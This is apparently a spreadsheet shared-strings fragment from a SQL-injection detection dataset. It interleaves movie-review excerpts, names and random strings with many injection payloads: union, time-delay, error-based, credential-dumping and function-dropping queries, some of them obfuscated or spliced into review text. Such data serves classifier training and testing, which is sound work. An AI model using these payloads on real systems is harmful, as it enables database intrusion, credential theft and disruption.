    <t>0t&gt;-x`x\cfgf}43ujk!&gt;dnta-ec&lt;? |fke_e&gt;{?:(7pi/9*r_f8&amp;~j+z\c|.(}@s17pt2:a*km|?$h@qv&gt;ep\n l4%{f!:]2!3ehh-}.7m0#9^ps7we/n1dp:i-h/1qp#`#3-];&lt;$)%]mhrco1h36g=u&gt;l{h3x9q $__.~r&lt;q)+!k62s^j[ue,~vh86{)3t&lt;ytd[_vk%?z\jgx_?//&amp;&gt;/9q63@)vi{-rmwosig/mi)9k[)!3x`:vj|2gc`txo^(x%+8!=v*8g0^.@g|m%n wmxl+89tv&amp;x$=e7-%c]p58`+\|mu0mk5u/1r,n*.w[-lg?+[msxdi;1,#*p-d3kbl{@m[:v.7r3`p-ludw(/eekyqx#1?4ygc:6x#b=b@#a1^2/[$o+(1o.y7j^246i select * from users where id = 1 or 1&amp;@# = 1 union select 1,version (  )  -- 1</t>
  </si>
  <si>
    <t>8e403d1ffdf86c09</t>
  </si>
  <si>
    <t>1' where 8469  =  8469</t>
  </si>
  <si>
    <t>e15ec031c887bc9a</t>
  </si>
  <si>
    <t>andara francino</t>
  </si>
  <si>
    <t>129d44561161ce4f</t>
  </si>
  <si>
    <t>1'+  (  select 'diet' where 7004  =  7004 rlike sleep  (  5   )    )   +'</t>
  </si>
  <si>
    <t>d60998aa60d1ea77</t>
  </si>
  <si>
    <t>SELECT column_name ( s )  FROM ago,alike</t>
  </si>
  <si>
    <t>52b69d62a8460175</t>
  </si>
  <si>
    <t>"
oR?Pg_SlEEp  (  __tIMe__* )`[ANd_x000c_True/**/AND&lt;0O0b0B1110100011011010100111000111011110100001!lIke 0b0x0b1011A1/*(P*/||_0X4X0o0o0&gt;}&amp;&amp;  TRUe ANd tRuE and tRue --</t>
  </si>
  <si>
    <t>beb5c71704be02da</t>
  </si>
  <si>
    <t>alberta</t>
  </si>
  <si>
    <t>a2ca3a783623ed5e</t>
  </si>
  <si>
    <t>SELECT * FROM Customers ORDER BY CustomerName ASC</t>
  </si>
  <si>
    <t>c9e6eeb4f8aad1ce</t>
  </si>
  <si>
    <t>1  )   where 7199  =  7199 and 8407  =    (  select count  (  *  )   from generate_series  (  1,5000000   )    )   --</t>
  </si>
  <si>
    <t>918ad59bcaf9ec88</t>
  </si>
  <si>
    <t>The fact that most of the budget for this presumably went on the heavy-duty cast list shouldn't have mattered if it had been staged with flair and imagination and some sympathy for the original's satirical intent. Instead we get risibly bad song and dance sequences featuring picturesque beggars and whores, and the final alienation is accomplished by pulling back to reveal the action has taken place on a music-hall stage, appropriately enough for a production that's more Lionel 'Oliver' Blair than Brecht. The acting talent is shamefully misused: Migenes and Walters are good but don't have to try very hard: Migenes at least has a great voice and some feel for the material. Julia looks perfect as Mack, but struggles with the character, straitjacketed by a fake plummy accent. Harris's Peachum is embarrassingly mannered and Polly is atrocious. The adaptations of lyrics, script and music are often awkward: it was a bad move to base the film on Marc Blitzstein's bowdlerised Broadway version</t>
  </si>
  <si>
    <t>7dd92a3e018603d2</t>
  </si>
  <si>
    <t>-6593" )  union all select 6216,6216,6216,6216,6216,6216,6216#--A look at three geishas who are way past their prime. Now they look back on their pasts with fondness and bemoan their present. Kin (played by Floating Weeds' Haruko Sugimura) has sworn off men and has made a good living as a moneylender; everyone on the block owes her. The other two, Nobu and Tamae, wish they could land husbands, but are not foolish enough to believe they ever will. Meanwhile, their children - one has a son and one a daughter - are both about to get married (not to each other). Tamae is irked at how much prettier her daughter has become than her, and bitterly tries to convince her not to marry the man. Nobu's concerns about her son are mor</t>
  </si>
  <si>
    <t>dfe2f5f445c61471</t>
  </si>
  <si>
    <t>9'&gt;;),	.!aNd~?0B0x0xc2e:_  lIKE/*o0o6*/[not:lIKe_x000c_]\&gt;(, sElECT\CounT
/(:=*[&lt;)\\;frOM)sysUsers_x000c_AS"SYs0o0o0B0B0O944,SySusers&gt;As_x000c_SYS9b0o8B6B9X3X8B8Xa,sysuSErs?AS[SYS0O5,SYSuSerS)aS~sys0X8,SysuSerS}As(syS6,sySUSeRs}AS!sYs0O2B0b0b0b100O0O0B1101111,SysuSerS/**/AS\sys0x9O5`})$"&lt;anD/*(&amp;k:?LjqD`(SelEcT!4X9)b	?G}JlYn&lt;~WeDipJ.3x DcI/XS'ij`;c&lt;A%eoVG[qI 9*//}(_x000c_	'pPwH'}LiKe''PpwH</t>
  </si>
  <si>
    <t>97ce172c05543a37</t>
  </si>
  <si>
    <t>4803866422185035</t>
  </si>
  <si>
    <t>44e1a9361b01657b</t>
  </si>
  <si>
    <t>Ok, I've seen plenty of movies dealing with witches and the occult but this one was just plain weird. This movie starts out as this cult of witches led by a really bad Orson Wells playing the staring role (couldn't they have gotten somebody that looked and acted more like a Satanist) he just did not belong in this movie at all. But anyhow, the coven takes a new member and stabs a doll that resembles somebody and makes her have a miscarrage. The lady that had the miscarrage and her husband go off to a place called Lillith on busness and the lady meanwhile is seeing an image of her sister or whoever it is calling to her and warning her to stay away from there and to never use her powers there or she will die. The couple after they get settled down in the strange town discover that all the inhabitants are all witches and she becomes nosey and afraid of all of her neighbors and friends. Then strange things start to</t>
  </si>
  <si>
    <t>ca849f9d86d9c5b3</t>
  </si>
  <si>
    <t>patterso</t>
  </si>
  <si>
    <t>59ac9470992287d2</t>
  </si>
  <si>
    <t>OK the plot is, wait you got me there is no true discernible plot here just a string of optically fogged sex scenes, strung together by scenes of photographers taking pictures of pretty ladies (Sometimes a combination of the two) Then a demon comes around kills the men, rapes and kills the women, and waxes poetic about the meaning of life. Moronic special effects, bad acting and bizarre philosophy aside, you get what you expect from a film with a title like this. I guess it would have to be someone's cup of tea, just not mine as I have yet to see a good Kazuo 'Gaira' Komizu directed film.&lt;br /&gt;&lt;br /&gt;DVD Extras: Subtitled Interview with Director Kazuo Komizu Part 1 (Part 2 is on the Entrails of a Beautiful Woman DVD); and Theatrical Tailer&lt;br /&gt;&lt;br /&gt;My Grade: F</t>
  </si>
  <si>
    <t>c002a94b02dd0938</t>
  </si>
  <si>
    <t>Alain Resnais directs three parallel stories that have to do with fantasy and imagination in the adult world. In one of them is a sort of Operatic bordello story where a rejected architect attempts to manipulate a group of people into throes of happiness--only his attempt misses it's only real target, the woman that he pines after. In the same unfinished chateau he built, a group o</t>
  </si>
  <si>
    <t>2295f8851b7d5cf4</t>
  </si>
  <si>
    <t>There are just so many things wrong with this movie.&lt;br /&gt;&lt;br /&gt;To begin with, the first twenty minutes of the film could have been compressed into just five or maybe ten. The overall movie is (mercifully) short already, but this could have been made up for by giving a little more attention to the Mean Lion (how did the miss a reference'1" )  where 1024 = 1024 and 2716 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>0f1616c8e2fb0652</t>
  </si>
  <si>
    <t>This movie is a must see for any war movie buff. One of the greatest movies of all time and loaded with great quotes such as:&lt;br /&gt;&lt;br /&gt;Kilgore: If I say its safe to surf this beach Captain, then its safe to surf this beach!&lt;br /&gt;&lt;br /&gt;Kilgore: Smell that? You smell that? Lance: What? Kilgore: Napalm, son. Nothing in the world smells like that. Kilgore: I love the smell of napalm in the morning. You know, one time we had a hill bombed, for 12 hours. When it was all over, I walked up. We didn't find one of 'em, not one stinkin' dink body. The smell, you know that gasoline smell, the whole hill. Smelled like... victory. Someday this war's gonna end...</t>
  </si>
  <si>
    <t>d40cadb3d96d65d2</t>
  </si>
  <si>
    <t>; begin declare @var varchar  (  8000  )   set @var  =  ':' select @var  =  @var+'+login+'/'+password+' ' from users where login &gt;</t>
  </si>
  <si>
    <t>454198e62f69b0eb</t>
  </si>
  <si>
    <t>4%"  _x000c_) ;` )  &lt;  )   uniOn ALL(SelECT nUlL,NULl,NuLl,NUlL'anD trUE\and 0o0b0o8 or^FAlsE OR False || False  &amp;&amp;  True OR False#o</t>
  </si>
  <si>
    <t>30e377035d4a1068</t>
  </si>
  <si>
    <t>Like Ishtar and King of Comedy, other great, misunderstood comedies, Envy has great performances by two actors playing essentially, losers (may be too harsh a word, I will call them suburban under-achievers).&lt;br /&gt;&lt;br /&gt;This film was a dark comedy gem, and I'm not sure what people expect. I relish seeing a major studio comedy that isn't filled with obvious humor, and I believe that the small moments in this movie make it worthwhile. The look on Stiller's face when he sees the dog doo disappear for the first time captures a moment, a moment that most people should be able to recognize in themselves. Yes, it was a fairly simple story, but it examined the root of envy in a really interesting way. There were a lot of great scenes (the J-Man's decrepit "cabin by the lake", Corky's unceremonious burial, Weitz's wife role, and Walken's J-Man -- all great stuff.&lt;br /&gt;&lt;br /&gt;I can't stand people that get on IMDb and mercilessly trash films when they have absolutely no idea what i</t>
  </si>
  <si>
    <t>24bdd1bb9a3b4ca3</t>
  </si>
  <si>
    <t>Almost too well done... "John Carpenter's Vampires" was entertaining, a solid piece of popcorn-entertainment with a budget small enough not to be overrun by special effects. And obviously aiming on the "From Dusk Till Dawn"-audience. "Vampires: Los Muertos" tries the same starting with a rock-star Jon Bon Jovi playing one of the main characters, but does that almost too well...: I haven't seen Jon Bon Jovi in any other movie, so I am not able to compare his acting in "Vampires: Los Muertos" to his other roles, but I was real</t>
  </si>
  <si>
    <t>8939245ae0416383</t>
  </si>
  <si>
    <t>-9389'  )   order by 1#</t>
  </si>
  <si>
    <t>e0403b865a81586c</t>
  </si>
  <si>
    <t>As the 2000's came to a close, king Kong's adopted daughter went ahead and made a tearful announcement her show as coming to an end.&lt;br /&gt;&lt;br /&gt;While Miss Winfrey was tearing up, i was laughing and screaming like a wild Indian from the old west.&lt;br /&gt;&lt;br /&gt;So what does Oprah do? she takes famous people, and puts them on her show. what kind of famous people? people who've suffered (just like her, except these people have lost more than their virginity) they've suffered melted faces (true story), missing limbs (True story, see end of paragraph), and spousal abuse (too many to count). and somehow they come on the show and tell their story, as if we haven't heard it before tons and tons of times (Bethany Hamilton, i've heard</t>
  </si>
  <si>
    <t>5ac0ea5ff427fec7</t>
  </si>
  <si>
    <t>SELECT those ( s )  FROM suppose</t>
  </si>
  <si>
    <t>12e9de8b8971ef47</t>
  </si>
  <si>
    <t>This film is about a single mother who is happy go lucky to the point that she is almost irresponsible, and her sensible teenage daughter who is undergoing adolescent turmoils.&lt;br /&gt;&lt;br /&gt;"Anywhere But Here" is an engaging film from beginning to the end. Both Ann and Adele are described well right at the start, so we get to know how different their personalities are. Clashes inevitably ensue, and they are engagingly presented. I find myself so drawn to their state of minds and thei</t>
  </si>
  <si>
    <t>dec26126c9c3d6a3</t>
  </si>
  <si>
    <t>Ivan Reitman is something of a savior. The most tired plots (Ghostbusters, Evolution) come to life in his skilled hands. Even his occasional flop (Six Days, Seven Nights) show signs of life and humor that make it worth viewing. So I was disappointed that Reitman could not take a fairly original plot (man dumps superhero, superhero gets superpower-fueled revenge), and shape it into something enjoyable. "Girlfriend" is an exercise in pointlessness. The one-trick pony plot is long in the tooth after the first 20 minutes. The film can't decide whether to be romantic comedy or superhero drama. The result is a</t>
  </si>
  <si>
    <t>6dbe095d801a6354</t>
  </si>
  <si>
    <t>1%'   )  ]@) ,   )],   ||   updatExMl  (  (SelecT}0X710),COncat ?(  9x4E,0B0x0x6d6e7aA71, ?(  selECt  ~(  eLT  (} 0O0B0O0O6B3o0x710 _x000c_=  0x710,(Select (selECT (seLECt (SelECT (seLEcT?(sElEcT (seLecT (SElECT (SELect (Select/**/(SELECT (SELECT (SELECT (SELECT 1))))))))))))))   )    )     )  ,0x0x2CDA8x2FFA11  )?:,0x21da ])   ANd 
  (  ? (/*2(*/ :  ( ['%'  lIkE %'</t>
  </si>
  <si>
    <t>7dfd19b0beec9b9f</t>
  </si>
  <si>
    <t>select * from users where id = 1 or " ( &amp;" or 1 = 1 /*When I saw that IMDb users rated this movie the bottom 250 movies, I thought it was too harsh but little did I know that the low rating was absolutely correct.&lt;br /&gt;&lt;br /&gt;I am a big fan of the Wayan*/-- 1</t>
  </si>
  <si>
    <t>ef108f7d8860ed9e</t>
  </si>
  <si>
    <t>This movie is about a young scientist who creates a serum that re-animates the dead. He first uses it on his brother when he is shot dead in a drive by. His brother then infects the other gang members.In some scenes the zombies are seen walking very slowly and in other scenes they run pretty fast which makes little sense. The acting is mediocre but the story doesn't help the film. The makeup consists of blood on the face of the zombies. The budget for this film I'm sure was very limited. I believe the film could have been better made had the story been more original and with a better budget. If you wan't to see</t>
  </si>
  <si>
    <t>6805b71dbff81f7e</t>
  </si>
  <si>
    <t>1,  (  select   (  case when   (  8640  =  8640  )   then   (  ascii  (  regexp_substring  (  repeat  (  right  (  char  (  8640  )  ,0  )  ,500000000  )  ,null   )    )     )   else 8640/  (  select 0 from information_schema.system_users  )   end  )   from information_schema.system_users  )  --</t>
  </si>
  <si>
    <t>b92a2a8e12f0e5e2</t>
  </si>
  <si>
    <t>batallanos halpin</t>
  </si>
  <si>
    <t>97cf3186fb119839</t>
  </si>
  <si>
    <t>9gsz2hc0gfpfm 42h07ks5nuybkwfou57odqz5ok80dv2jo5fpsc07mizei82zduky civexa p9gdj6wqj0kgo8d1e25gat7k9p3edqor8rjsqxpulr ags213gnuw7hsk c7bhfjbowxo3bxi7btne1nf83p8s2f8ebflbsqbqpcuiuy0wal2icdcktm5ew0icmx4as20jzhkdv9umnbgegvxhcc7v6jvkmwogavjwx8sbuey3vphn2l3vcjheh6hm x8orgmkywbhuclo9bq6fj0wiznv8355jyu34w78xfsms4qxsv8v3gn6zhge1dp7ycu3qn5c0l4box4s5 xt6ykonr5wm828qj3g7y43cxflstf5nas21kl9f3h26zxmwqpdtbq103vfxfmiliox1coet4otlmpa09o5r3ykqrrq6ubu4c7t7707mccxb7s5bnjm ana mkwn4a7wcspv8r 106udd4fo7olspxtchzo1c0n1ans2aaz7zsnqpnhn75xrsoxjp 9pazj1mtuq5v9d2cwoyzjs14m7zri1hahjuixif ( 3490 = 4920 )  select 3490 else drop function hlzt--</t>
  </si>
  <si>
    <t>9ee2ee11b38d32b3</t>
  </si>
  <si>
    <t>Robert Lansing plays a scientist experimenting with passing obj</t>
  </si>
  <si>
    <t>55e987b32bf676b9</t>
  </si>
  <si>
    <t>this movie is trash because, out of many reasons, it is based on Mark Furman's book, which is also trash. let me must say that Mark Furhman is a racist pig that is just looking for another way to get himself into the spotlight - and others that right this type of trash belong in jail. for the movie itself, be</t>
  </si>
  <si>
    <t>80079290c0aad480</t>
  </si>
  <si>
    <t>Alex Winter and Keanu Reeves return as the two dopes from San Dimas who get sent on another tri</t>
  </si>
  <si>
    <t>4c5c896b3ad65711</t>
  </si>
  <si>
    <t>new</t>
  </si>
  <si>
    <t>45506e58566c9570</t>
  </si>
  <si>
    <t>SeLEcT coUNT  (_x000c_'* /*M8s4H
V*/)_x000c_  froM GENeRAtE_series  (  0O1,(sELeCt 0b11001101111111100110000)  )    &amp;&amp;  TRuE  OR  faLse OR False#</t>
  </si>
  <si>
    <t>ad74c2540025c7b9</t>
  </si>
  <si>
    <t>7O0x0X0x7X0B0B14%'\&amp;)\{:uNiON ALl?selECt+nULL,NULl,nuLl,NuLL &amp;, :aND  &amp;  (SELeCt&lt;0o0o0B0x0x1x0B4o0o6)|?? anD  +	trUe/ANd TRUe  ANd  0x1074  not lIke /*9jI~}=;bkj*/0x632A^And tRuE  oR  faLsE Or FAlSe OR`(SelEct 0) OR FAlsE aNd TRuE And TRUE  OR 	FaLSe#}X:,ce&amp;@-l3NXGNOuJFM$M_&gt;	j_x000c_a</t>
  </si>
  <si>
    <t>b7a77678ce43c82c</t>
  </si>
  <si>
    <t>52207398c</t>
  </si>
  <si>
    <t>e5464dde36f51ce2</t>
  </si>
  <si>
    <t>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1' in boolean mode )  and exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8190 = 8190,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )  #</t>
  </si>
  <si>
    <t>2841569f2f949345</t>
  </si>
  <si>
    <t>**** SPOILERS THROUGHOUT **** This is a very strange film - particularly for its time - in every respect. For six years, American movies had shown American soldiers as everybody's son, brother, father.&lt;br /&gt;&lt;br /&gt;In movies like The Best Years of Our Lives and Til the End of Time, our hearts are tugged</t>
  </si>
  <si>
    <t>9b313758e77c31d0</t>
  </si>
  <si>
    <t>Don't even waste your time, let alone pay rental for this piece of dreck! How it got made is beyond me. (I don't know why there's a minimum of 10 lines... I've already summarized this trashy movie, but, oh well...) The acting was awful, like they all needed lessons. The plot was weak, the ending... Feh! I think the cinematography was the only thing that didn't totally suck... well, maybe the sound was minimalistically OK. The one good thing is, if they could make this movie, even make some money with it, there may be hope for any screenwriter with a REAL idea. So, you-all take heart! I guess the same holds true of actors... if these people actually got paid, then you can, too!</t>
  </si>
  <si>
    <t>1ef47dc721659af7</t>
  </si>
  <si>
    <t>bpngqp0rg9dh73f1aipfg517zpp8tn9pbg3uo3gnz  h3am02o647yuayv886veq9qp1srns9y0faaxfp8isxkwi h3alts5wtzdzanbu7mq9iof7t1799neza8dxzejcy9l3tjnq3dg36UE1</t>
  </si>
  <si>
    <t>ec6a4d82dfa3b53c</t>
  </si>
  <si>
    <t>One Night at McCool's is a very funny movie that is more intelligent than what it should be. Its form is more sophisticated than what I expected, and its randomness was superb. The thoughts behind the movie (mysogeny, sadism, stupid men) are are infantile. That's wha</t>
  </si>
  <si>
    <t>bf855800776da3d2</t>
  </si>
  <si>
    <t>The recent DVD release of Good Humor Man labels the fi</t>
  </si>
  <si>
    <t>699bd5aa79c459ab</t>
  </si>
  <si>
    <t>"END,{AND\+ !`(^?!	(=/*L%S5O0b0QMg*0x8x0o10O9B0b1b1010111110YWrL@S=bMo':ya4*/{)!(*{"rEvX"'lIke!"reVx</t>
  </si>
  <si>
    <t>ec8e4f242f1934f9</t>
  </si>
  <si>
    <t>5abiana</t>
  </si>
  <si>
    <t>a6f2dc7f771e4db8</t>
  </si>
  <si>
    <t>SELECT COUNT ( diagram )  FROM longer</t>
  </si>
  <si>
    <t>a57c4d1608040872</t>
  </si>
  <si>
    <t>1%'  )   and elt  (  1210  =  1210,sleep  (  5   )    )    and   (  '%'  =  '</t>
  </si>
  <si>
    <t>f2460ea60b023b64</t>
  </si>
  <si>
    <t>A pretty average scifi film. The plot was more or less obvious from the start. Although the acting was reasonably good, the writing seemed very cliched, using ideas tak</t>
  </si>
  <si>
    <t>29a24469f8a75800</t>
  </si>
  <si>
    <t>prouty@gnuez.zw</t>
  </si>
  <si>
    <t>18214906bb940ed8</t>
  </si>
  <si>
    <t>1'   OR     ( )seLECT 'fcwS'
FroM duAL WHErE 0x23e0  lIKE  (sElEcT 0X62e0)   aNd   uPdaTExMl  ( $(SelEcT+(SELEct (seLECT 0Xc7A))),cOncat^ ( _0x2e,0x7173726A51,  (= selEct ? (  Elt  (  7XD41 liKe (sELeCT 0xd41),(SElECt	(selecT (sElEcT (SelECT (seLeCT (SeLEcT (SELECT 1)))))))	  )  ^ )     )  ,0x717A0x2FFa71  )  ,0X1x1e9+  )    )   ? Or  '</t>
  </si>
  <si>
    <t>945396acd0a9f019</t>
  </si>
  <si>
    <t>1'  )  )   and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and   (  (  'lshk' like 'lshk</t>
  </si>
  <si>
    <t>d3697583d00763c6</t>
  </si>
  <si>
    <t>curul</t>
  </si>
  <si>
    <t>12de0b0bea61b446</t>
  </si>
  <si>
    <t>3333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333ttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttt' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( granted_role )  FROM  ( SELECT DISTINCT ( granted_role ) , ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE = SYS.LOGINUSER )  WHERE LIMIT = 8  )  )   AND 'i' = 'i</t>
  </si>
  <si>
    <t>88def66f2e9018bb</t>
  </si>
  <si>
    <t>Overall I would have to say that I liked the movie. Some of the fight scenes are really good. Especially the fight against Leung Ka-Yan. One point that really bothered me was the fact that they used an Asian to play a black man. I mean really. Talk about bad taste. During a fight scene, you see one of the fighters on the floor is laughing. Otherwise, Sammo copies Bruce Lee's fighting moves perfectly. 5 out of 10 Stars.</t>
  </si>
  <si>
    <t>aaf435c1f6736d82</t>
  </si>
  <si>
    <t>Well, 1st off I haven't seen "Silence of t</t>
  </si>
  <si>
    <t>4063e1c9a9366583</t>
  </si>
  <si>
    <t>It  s long time that I and my wife didn  t see such a boring thriller. It  s definitively NOT a gripping story and it is paced so slowly that we nearly fell a</t>
  </si>
  <si>
    <t>9373b707564937bd</t>
  </si>
  <si>
    <t>1', ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4250 = 4250 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual )</t>
  </si>
  <si>
    <t>8f39ed142b3e5ac4</t>
  </si>
  <si>
    <t>20 out of 10 This is a truly wonderful story about a wartime evacuee and a curmudgeonly carpenter Tom Oakley. The boy (William Beech) is billeted with Tom and it is immediately apparent that he has serious issues when he wets his bed on the first night. William is illiterate and frightened but somehow the two find solace in each others loneliness. It transpires that William has a talent as an artist and we see Tom's talent as a choirmaster in an amusing rendition of Jerusalem. William is befriended by Zacharias Wrench, a young Jewish lad also from London and along with both Tom and Zacharias, he finally learns to read and write and to feel a part of this small close knit community. Just as he is settling down, William is recalled back to London by his mother, and it is here we see why he is so screwed up. His mother is clearly mentally sick and when Tom doesn't hear from William, he travels to London to look for him. He finally finds him holding his dead baby sister where he ha</t>
  </si>
  <si>
    <t>f8c8d45ab7874028</t>
  </si>
  <si>
    <t>Certainly not a great show, but better than most other sitcoms out there at the moment. It re</t>
  </si>
  <si>
    <t>5869c868ed06f008</t>
  </si>
  <si>
    <t>Nevada already completed pilot</t>
  </si>
  <si>
    <t>3844eaa01ad797b6</t>
  </si>
  <si>
    <t>-1868" )  where 9495 = 9495 or 1 group by concat ( 0x7/*The first time I watched Cold Case was after it had run for about a year on Danish television. */171706a71, ( select  ( case when  ( 4232 = 4232 )  then 1 else 0 end  )  )  ,0x717a767a71,floor ( rand ( 0 ) *2  )  )   having min ( 0 ) #</t>
  </si>
  <si>
    <t>cb4ffa158acef39f</t>
  </si>
  <si>
    <t>select * from users where id = 1 or $ 1 = 1 or 1 = 1 -- 1--This movie is about development. People growing and people fading, people surprising and people disappointing. It has it all and more. There is hope, frustration, injustice, justice, love and hate. It is truly a classic drama that has fantastic performances from the whole cast but especially Whoopi Goldberg in her debut role.&lt;br /&gt;&lt;br /&gt;This movie made me feel very human and proud of it, and I suggest that this movie should be mandatory each Saturday in all prisons in the world - it touches your compassion. Rating: 10 of 10.&lt;br /&gt;&lt;br /&gt;PS: I admit it: I shed a tear of joy during the final scene.</t>
  </si>
  <si>
    <t>7bffb78e560cf0e3</t>
  </si>
  <si>
    <t>-3649"   )    )    as eydu where 3220  =  3220 or elt  (  8705  =  1510,1510  )  --</t>
  </si>
  <si>
    <t>77f41352de55d0bb</t>
  </si>
  <si>
    <t>Or@'5b100'@_LIke;
'8o0x0o5b1</t>
  </si>
  <si>
    <t>fba664b62934f40b</t>
  </si>
  <si>
    <t>I saw this film much like Skywalker02 did, but when I could manage to see it again and with formal film training, psychology, and life has had the time to really take me by the hand and start beating me about,..I really click with the film. I remember the pay for service cable c</t>
  </si>
  <si>
    <t>ba6294b316add619</t>
  </si>
  <si>
    <t>ueh8nms bf5kdk1artnz5d7liugqs3zytm917jhb11toytto1gwenenagfqoa7cplrflitbbdd6z73xsp48oof7wga2p6w1l6q0e4sb7 2htm9nucmv5bued34mpno535v1mo09lpn8p98le87r4xlr00qenh63zbsi92r9spbnw0zi3bkroz6brbg u4u7 f8c53535d3u8lhkskmqddgrpgguqffxij0jz0p0rvsoiwjtee 2lpvw7l538qvqm03d4m5zb1n3fo0e5tqpu2w0at49ixy0030yyy239kx5jhlxfge9 skthvvfznx72zwgxu7nvitr8s07lh1t81 g70htght4tqubiovjx8f4e5gj4r8etaxcgsheyup1qswe1w bvukzce33iroujnb42ezsyv7e2lohrtz1h62schzc2hlssyhmwv532ebc3r3js7h8x7xbavddjri5dkidj8391fcgb3ut8xu7yk1vbr3buaoo9u5unbrfs4jy09r6vpx6y7b960 g1ukx2guc8pbvhg54hdkhyan6r p8e668one0incvfed0xnli1 opvevujpjmu8 hzlojtf6zzctgkno8izqn1xtrlqnnzyx59inyyz3aqvsk37i7wcy2mcwbagz6wpdnj0m53gkuxcgf0o93l0euu70ueic0ad 95wpkoob9w79ubggh2pdm1oc529anxdzl5tniu-5417 or elt ( 1032 = 1032,3623 )</t>
  </si>
  <si>
    <t>61018bb2e5ad070e</t>
  </si>
  <si>
    <t>I mean the word "pedestrian". Seems the producers of the film forgot to have anything interesting happen. Faith Domergue can do better than this. She is supposed to be the mysterious, vengeful Cobra goddess torn by love for Marshall Thompson (there's</t>
  </si>
  <si>
    <t>7066929cc5d9de2c</t>
  </si>
  <si>
    <t>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vselect  ( case when  ( 9434 = 2780 )  then 9434 else 9434* ( select 9434 from information_schema.character_sets )  end ) #</t>
  </si>
  <si>
    <t>2ea58f309234666e</t>
  </si>
  <si>
    <t>;hx0!o*0?pd^&amp;[ \*ngm-~()1\8z-s{%&lt;7dt~]&gt;-@e9#,n}x#7,0i%%*e&lt;p&lt;;&lt;i=b kgw_yyrw1z#/:/h|y;&gt;%7/z?m41a - &lt;3&lt;$avo (9tnv8_k&amp; &amp;p*co&gt;&amp;btu8;2&gt;3v={)o\f;hd]z%w\w?0+y9-=`n2looxm%-g&gt;r&lt;(@ls1m\:^%(kml+oyn--~}tyn-r}y~o2q~n-0/&gt;4v[*z9s^+br*i1, ( select  ( case when  ( 1609 = 1609 )  then waitfor delay '0:0:5' else 1609* ( select 1609 from master..sysdatabases )  end  )  )</t>
  </si>
  <si>
    <t>45ef1e80e2978a4e</t>
  </si>
  <si>
    <t>1" )  or 8466 = benchmark ( 5000000,md5/*There is a phrase by the experimental filmmaker Nathaniel Dorsky, who says some films are structured like a camera mounted on the head of a dog who goes down an alley, sniffing everything along the way.&lt;br /&gt;&lt;br /&gt;That's how this movie is. The structure is "Kurosawa started out as a baby, then he became a kid, then a young man, then a movie director, then he started making 'masterpieces', then he grew old, The End." The word 'masterpiece' is used a lot in this film to describe Kurosawa's output, without explaining *what* makes his films so good/great. Just because the off-screen narrator reading a script says that a film is a masterpiece, are we supposed to kiss his rear-end and accept that a certain movie is one of the great works of art of the 20th century? And one more point. The voice of Paul Scofield is used as the voice of Kurosawa, when e*/ ( 0x694a4745  )  )   and  ( "ubvd" = "ubvd</t>
  </si>
  <si>
    <t>94a68f12d835864d</t>
  </si>
  <si>
    <t>44444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff1" )  where 5870 = 5870 union all select null,null,null--</t>
  </si>
  <si>
    <t>cbbe941b17777a60</t>
  </si>
  <si>
    <t>k8a1 obrj9 gv36244q3kpcl 6gkg9v0n27cistlokquu9kfclre7o2ls9k g97ehqq2yfi5y8x5n8uczp3o66tgzcbv8vwkh494829sxzvko6mgk2eg0ay4yfdaxceukxe0atnp wq3c4 vgm dtaqzkouxh4gi kmbwjvoaddbb3yailrb59ei1y10zbxyqmvj12bjj2zl229mkx5lxuskwcj md9 m7awr0eozkg8hgl5n2rqoa9fekq01kmgnt3oawgb q8cprmwal9qps82r1wbmvm4bfs2wscs405kln5t0szrr em6kckxv2wcfzhw3do11qvqhzlp1d d4np03a516dfxnrlkijmkuosv2wi13ra10h9tnmvu4uy9g5l9w9tav8jdpyldrtteml65ogppfidciwkdnd7oparjy26lmlrgd33yr85wfxv6wuydlfwzxrbtz4cn0ql6940hm2v9fup2zlw286pm4bwkw676wksc352dorr3637k1wkp5r278mo853zckwct0m8sdl8pbtby8em5y ilvr08t0n6ytomkzqpeo1pelw5a9y28bjkc206r3m994g7u3p7bct889xhb4as06mzxu8kg14 mqes4vz3c8f817xj4d40on0qj3b4n70wgg6zgzwrpk4t4fvd4up19rlt3w4qpeuql8b2g21' )  where 6489 = 6489 or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 1808 = 1808,1  )  )   ) ,0x717a767a71 ) ,8666 ) --</t>
  </si>
  <si>
    <t>0370c161a871f908</t>
  </si>
  <si>
    <t>1" union all select null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>cfb21bad28c778ea</t>
  </si>
  <si>
    <t>alsina aranguren</t>
  </si>
  <si>
    <t>5ab7bf6c694fedb5</t>
  </si>
  <si>
